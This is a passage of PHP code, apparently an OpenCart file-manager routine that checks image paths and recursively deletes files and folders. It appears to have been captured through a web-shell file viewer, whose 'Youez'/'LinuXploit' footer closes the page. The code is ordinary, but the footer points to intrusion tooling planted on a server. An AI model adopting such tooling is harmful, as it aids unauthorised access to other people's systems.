			if ($path == DIR_IMAGE . &#039;catalog&#039; || substr(str_replace(&#039;\\&#039;, &#039;/&#039;, realpath(DIR_IMAGE . $path)), 0, strlen(DIR_IMAGE . &#039;catalog&#039;)) != str_replace(&#039;\\&#039;, &#039;/&#039;, DIR_IMAGE . &#039;catalog&#039;)) {
				$json[&#039;error&#039;] = $this-&gt;language-&gt;get(&#039;error_delete&#039;);

				break;
			}
		}

		if (!$json) {
			// Loop through each path
			foreach ($paths as $path) {
				$path = rtrim(DIR_IMAGE . $path, &#039;/&#039;);

				// If path is just a file delete it
				if (is_file($path)) {
					unlink($path);

				// If path is a directory beging deleting each file and sub folder
				} elseif (is_dir($path)) {
					$files = array();

					// Make path into an array
					$path = array($path);

					// While the path array is still populated keep looping through
					while (count($path) != 0) {
						$next = array_shift($path);

						foreach (glob($next) as $file) {
							// If directory add to path array
							if (is_dir($file)) {
								$path[] = $file . &#039;/*&#039;;
							}

							// Add the file to the files to be deleted array
							$files[] = $file;
						}
					}

					// Reverse sort the file array
					rsort($files);

					foreach ($files as $file) {
						// If file just delete
						if (is_file($file)) {
							unlink($file);

						// If directory use the remove directory function
						} elseif (is_dir($file)) {
							rmdir($file);
						}
					}
				}
			}

			$json[&#039;success&#039;] = $this-&gt;language-&gt;get(&#039;text_delete&#039;);
		}

		$this-&gt;response-&gt;addHeader(&#039;Content-Type: application/json&#039;);
		$this-&gt;response-&gt;setOutput(json_encode($json));
	}
}</pre><center><br>Youez - 2016 - github.com/yon3zu<br><a href='https://linuxploit.com/' target='_blank'>LinuXploit</a></center>